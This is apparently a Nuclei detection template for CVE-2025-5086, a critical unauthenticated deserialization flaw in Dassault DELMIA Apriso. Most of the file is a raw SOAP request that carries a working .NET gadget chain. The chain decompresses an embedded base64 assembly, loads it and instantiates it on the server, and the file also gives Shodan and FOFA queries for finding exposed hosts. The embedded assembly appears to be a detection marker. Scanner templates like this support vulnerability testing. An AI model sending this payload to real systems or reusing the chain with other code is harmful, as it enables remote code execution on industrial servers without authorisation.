id: CVE-2025-5086 info: name: Dassault Systèmes DELMIA Apriso (up to 2025) - Insecure Deserialization author: hacktronai,iamnoooob,pdresearch severity: critical description: | A deserialization of untrusted data vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 could lead to a remote code execution. impact: | Unauthenticated attackers can exploit unsafe deserialization to execute arbitrary code on DELMIA Apriso servers, achieving complete system compromise. remediation: | Upgrade DELMIA Apriso to a version later than Release 2025 that properly validates deserialized data. reference: - https://www.hacktron.ai/blog/posts/dassault-delmia-apriso-rce/ - https://www.3ds.com/vulnerability/advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 9 cve-id: CVE-2025-5086 cwe-id: CWE-502 epss-score: 0.41392 epss-percentile: 0.97475 metadata: verified: true max-request: 1 shodan-query: html:"apriso" fofa-query: body="/Apriso/Portal" tags: cve,cve2025,delmia,apriso,serialization,rce,kev,vkev,vuln http: - raw: - |- POST /apriso/WebServices/FlexNetOperationsService.svc/Invoke HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml Soapaction: "http://tempuri.org/IFlexNetOperationsService/Invoke" 2<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089CompareSystem.StringSystem.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]ParsePresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35System.Windows.Markup.XamlReaderSystem.Func`2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]System.Object Parse(System.String)System.Object Parse(System.String)8Int32 Compare(System.String, System.String)System.Int32 Compare(System.String, System.String)82<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:s="clr-namespace:System;assembly=mscorlib" xmlns:r="clr-namespace:System.Reflection;assembly=mscorlib" xmlns:i="clr-namespace:System.IO;assembly=mscorlib" xmlns:c="clr-namespace:System.IO.Compression;assembly=System" > <s:Array x:Key="data" x:FactoryMethod="s:Convert.FromBase64String"> <x:Arguments> <s:String>H4sIAAAAAAAEAO1WzW8bVRD/reO0jtNYSQulEVXZ1ClK+Vg5jYNKhUgaO61D86U4dStUKVmvX5Ot1rur3efEyQEqIapy41AhcUAcuPRQQQ+VqCohITj1EIkDXDj1D0DiwAUQIsx7u/6IY9RcUCWUcXbezLyZN795n5l592N0AIjSt70NPERA43g63aQv8dKjBB50bQ08VKa3BhZXTV91PWfF08uqodu2w9UiU72KrZq2mp3Lq2WnxLSenvhgOMb8JDCtdOD70bHV2rhPEBnoVrqBAwg+ohMiQK0D65VyJMANNFoJKhKIHRj/ULiKv0ZbbyT9kAQuhQXfjbQpchk4tIe52EWEL9akxkjPNekaZ1VO7WA08JV1tuQn87Lm+Z6BEBthlIXGdvqReVzzmOUYIdblcKxDu/wmduEMFyInQzpRpaRXaUMoeyixHX0SGaLo+BDBjDudglFhcY+Gcz2aatc5SOorBCT/zoQSZhEw19JaShtJjQy/KSydsIgfp+7ke8BtageFnOeeaa/4wuNeJJiO5OU8fokEa5q8eHkqS+1fpF8T+oTlFENcZFIuPgd0CeXPUyM4GtRYm3YhH2ySO2RUPER4AKdxkngBbxBfIx7HXXxG/FviCfyBn6WfEnLx68ULshIhz6vCfutYSo7YhxTF9ENoXZIP4AGOE9+i7zR6lJcxjH7lVWjoJknDEZxD9GbrXN9B076Xeftl22w7QvhabQrVUqe3ZpxSxWJv4/q6yaubqWGtZFmYRNk3HM8yi8hv+JyVMVe8wQwOzeCOF9q0hYrNzTLTMk7ZNS3m5Zm3ZhrMR2DQuenYC8zSq1Lyz3Nav2KFM4SBwo26iqZl8o1Gbw1JLc0VVkSOczfj2PLUrDC+lKl4HrO5tC8w36XhmeyoK2FwxrEsAi7ya3mXGaZumZushFm9zAq6VWENBxmfY3qJeT58kqdE4UQD8/Dg4AYYDHBkYcInyaGdwKhnA3jRkPLrOEPreQajJI2SdJZ2ioJPv/rxg+SdL3O3fvvi5KPH332O2Neb1wr96ScfdahQoqqixGL3x5be7/spfo7W6XBfVMXh5wXr71QjSiIRU8Ijf0JspsXI0Sue7s469mTVYK5AvrjqOeu+2H2/JxtLm6jdme2odgFjKeN4Wcua0U07WHTG5BYQtH2K4nv/ZYR9+t+RIhf7WPCK7rCLvZVqYxck3o6r4/SON71f05E08QLyWCI+iQWSpjCHWdKniF8gWdA30V//bvfajIWtuLdan+WszFyATmfvAp1Fi07eFGxcpxMpaFBGLVKvTlaf+nU6tSb12uEI96P3FDFGnuwe9dDRbzPSbemTqv/SKIo5wGuESKn7Z+kTt4EYx92RR5VzFmvyLcj7wm/ySdHt3vjoOkYP+QsMXPrahN2i+dJRJh2EbJ2iOarYJH/xNpSoPzitQxLXNPmtyKgMZXHpdhLIVrAKHmLKyhxzod0Mc9Qw2nvKlZZ1BfdiCRV5L7ZW11rbWRlznjx88izTbFqETn1q3D79h6QG/3+p6WcNZJ+eBf0DwmVsFgAOAAA=</s:String> </x:Arguments> </s:Array> <i:MemoryStream x:Key="inputStream"> <x:Arguments> <StaticResource ResourceKey="data"></StaticResource> </x:Arguments> </i:MemoryStream> <c:GZipStream x:Key="gzipStream"> <x:Arguments> <StaticResource ResourceKey="inputStream"></StaticResource> <c:CompressionMode>0</c:CompressionMode> </x:Arguments> </c:GZipStream> <s:Array x:Key="buf" x:FactoryMethod="s:Array.CreateInstance"> <x:Arguments> <x:Type TypeName="s:Byte"/> <x:Int32>3584</x:Int32> </x:Arguments> </s:Array> <ObjectDataProvider x:Key="tmp" ObjectInstance="{StaticResource gzipStream}" MethodName="Read"> <ObjectDataProvider.MethodParameters> <StaticResource ResourceKey="buf"></StaticResource> <x:Int32>0</x:Int32> <x:Int32>3584</x:Int32> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> <ObjectDataProvider x:Key="asmLoad" ObjectType="{x:Type r:Assembly}" MethodName="Load"> <ObjectDataProvider.MethodParameters> <StaticResource ResourceKey="buf"></StaticResource> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> <ObjectDataProvider x:Key="types" ObjectInstance="{StaticResource asmLoad}" MethodName="GetTypes"> <ObjectDataProvider.MethodParameters/> </ObjectDataProvider> <ObjectDataProvider x:Key="firstType" ObjectInstance="{StaticResource types}" MethodName="GetValue"> <ObjectDataProvider.MethodParameters> <s:Int32>0</s:Int32> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> <ObjectDataProvider x:Key="createInstance" ObjectInstance="{StaticResource firstType}" MethodName="InvokeMember"> <ObjectDataProvider.MethodParameters> <x:Null/> <r:BindingFlags>512</r:BindingFlags> <x:Null/> <x:Null/> <x:Null/> <x:Null/> <x:Null/> <x:Null/> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> </ResourceDictionary> matchers: - type: dsl dsl: - 'contains(projectdiscovery, "cve-2025-5086")' - 'contains(content_type, "text/xml")' - 'status_code == 500' condition: and # digest: 4b0a00483046022100c2e09f0f9909d8556940dd14997ad3c371af9be7e2502afcc11c45c84d05a48d022100d8b2079881860925e4aa845711eb8c650af64df49f8c61148720082fb3a36db8:922c64590222798bb761d5b6d8e72950